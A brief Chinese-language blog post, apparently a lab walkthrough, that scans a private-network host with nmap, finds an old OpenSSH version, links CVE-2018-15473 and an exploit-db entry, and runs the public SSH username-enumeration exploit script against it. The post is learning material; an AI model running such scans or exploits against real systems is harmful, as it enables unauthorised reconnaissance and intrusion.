Sunday, August 23, 2020

找尋不安全的套件

揭露裝置套件版本

root@kali:/home/kali# nmap -sS -sV -p 22 192.168.92.129

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 05:35 EDT

Nmap scan report for 192.168.92.129

Host is up (0.00039s latency).


PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

MAC Address: 00:0C:29:D9:F1:65 (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds

搜尋是否使用不安全套件

https://www.cvedetails.com/cve/CVE-2018-15473/

下載公開漏洞工具進行攻擊

下載公開漏洞工具進行攻擊

https://www.exploit-db.com/exploits/45233


python 45233.py 192.168.92.129 -- port 22 -username root

python 45233.py 192.168.92.129 -- port 22 -username root2

No comments:

Post a Comment

n8n index

 【n8n免費本地端部署】Windows版|程式安裝x指令大補帖  【一鍵安裝 n8n】圖文教學,獲得無限額度自動化工具&限時免費升級企業版功能